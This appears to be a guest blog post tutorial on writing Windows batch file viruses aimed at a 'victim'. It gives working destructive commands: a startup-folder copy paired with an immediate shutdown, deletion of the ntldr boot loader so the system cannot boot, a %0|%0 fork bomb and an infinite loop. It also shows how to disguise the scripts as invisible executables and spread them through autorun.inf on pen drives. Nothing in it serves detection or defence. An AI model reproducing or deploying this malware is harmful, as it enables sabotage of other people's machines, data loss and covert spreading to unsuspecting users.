How to create Batch file viruses?
According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,
Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file
So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.
What can batch viruses do ?
They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.
Now lets start with simple codes,
Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.
goto x // infinite loop
This code will be opening command prompt screen infinite times , irritating victim and affecting performance.
2. copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds
Note : Files in Start up folder gets started automatically when windows starts .
Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.
3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.
del C:\ntldr //delete ntldr file
After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again.
4.%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.
To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.
Spreading batch viruses through pen drive -:
Open notepad and write
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
About The Author
This is a guest post written by Aneesh M Makker. Aneesh M.Makker is an Ethical hacker from Malout, a town in Punjab.Click here to visit his Facebook Profile